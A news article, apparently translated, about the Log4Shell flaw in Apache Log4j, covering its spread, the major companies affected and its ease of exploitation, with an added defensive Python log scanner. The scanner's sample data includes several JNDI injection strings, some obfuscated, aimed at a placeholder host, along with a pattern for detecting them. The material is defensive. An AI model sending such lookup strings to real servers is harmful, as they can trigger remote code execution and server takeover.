Log4Shell, the flaw that shook all servers

The flaw affects most of the planet's servers and will be exploited for as long as they have not been patched. © The Digital Artist, Pixabay

Hackers have used the discovery of the largest critical vulnerability in Internet history to launch massive attacks on the servers of businesses and organizations around the world. Tesla, Microsoft, Apple, Twitter, or even the game Minecraft are among the victims.


It has been dubbed “Log4Shell” and, in the opinion of experts, is the worst bug in the history of the Internet. This critical zero-day vulnerability was identified at the end of last month in the Apache Log4j Java library by a member of the Alibaba security team. But it is only in the past two days that the planet has been shaken by this flaw. Since last night, the government center for monitoring, alerting and responding to computer attacks (CERT-FR) has confirmed that it is currently widely used by hackers to remotely execute code and carry out attacks. The organization gave it a severity score of 10/10. And for good reason! This flaw affects almost every server running Java!

Hardly any high-tech giant has been spared, and the same is true of many government sites and services across the planet. As examples, Tesla, Apple, the game store Steam, Microsoft, the game Minecraft, Twitter and even the security experts at Cloudflare are affected. A fix was quickly released by the Apache Foundation, but the damage has already been done, as hackers have taken the opportunity to launch massive attacks. The time needed to deploy this update everywhere will give them ample opportunity to carry out their misdeeds.


Easy to exploit

Simply put, the flaw is striking in its simplicity. The attacker only needs to enter a few instructions to break into the target computer. It is enough to enter the address of a web page containing malicious Java code in place of an email address on a login page, for example Twitter's, for that code to be executed. From this point, the hacker can take control of the server by installing malware. Similarly, entering this malicious code in the Minecraft chat is a vector of infection.
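As an added example (not part of the original article), here is one way defenders can look for this kind of input in their own logs. It relies on the fact, not spelled out in the article, that the injected address reaches Log4j as a `${jndi:...}` lookup string; the log lines and `host.invalid` names are constructed samples.

```python
import re
from urllib.parse import unquote

# Nested lookups that resolve to literal text, e.g. ${lower:J} or ${::-j}.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I
)
# A JNDI lookup in a logged string, whatever scheme follows it.
_JNDI = re.compile(r"\$\{jndi:", re.I)


def _resolve(m):
    # Keep only the text the nested lookup would evaluate to.
    return m.group(1) if m.group(1) is not None else m.group(2)


def normalize(value, max_rounds=5):
    """URL-decode and collapse nested lookups until the string is stable."""
    for _ in range(max_rounds):
        collapsed = _NESTED.sub(_resolve, unquote(value))
        if collapsed == value:
            break
        value = collapsed
    return value


def is_suspicious(value):
    return bool(_JNDI.search(normalize(value)))


def scan(lines):
    """Return (line_number, line) for every log line carrying a JNDI lookup."""
    return [(n, l) for n, l in enumerate(lines, 1) if is_suspicious(l)]


# Constructed sample lines (not real traffic); hosts use the reserved .invalid TLD.
SAMPLE_LOG = [
    'POST /login email=alice@example.com ua="Mozilla/5.0"',
    'POST /login email=${jndi:ldap://host.invalid/a} ua="curl/7.79"',
    'GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fhost.invalid%2Fa%7D',
    'POST /login email=${${lower:J}ndi:ldap://host.invalid/a}',
    'POST /chat msg=${${::-j}${::-n}di:ldap://host.invalid/a}',
    'GET /docs/jndi-overview.html',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit in the logs shows that someone tried the input, not that the server was compromised; it marks the hosts whose patch status should be checked first.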

With malware, the attacker can easily access the computer remotely and collect its data, or use it to perform malicious activities such as cryptomining… According to some experts, this major flaw also shows that open source software is now an easy target for attacks because it is so heavily used in infrastructure.

Hundreds of different open source components are used on servers. It turns out that some of them have carried severe vulnerabilities for many years without anyone noticing. It therefore remains difficult to secure the entire architecture that depends on this software.

This is exactly the kind of mission taken on by ethical hackers operating on platforms such as HackerOne's Internet Bug Bounty, for example. These hackers, called “hunters”, earn bounties for spotting flaws in open source software that doesn’t have large funding sources.


About the author: Seth Grace
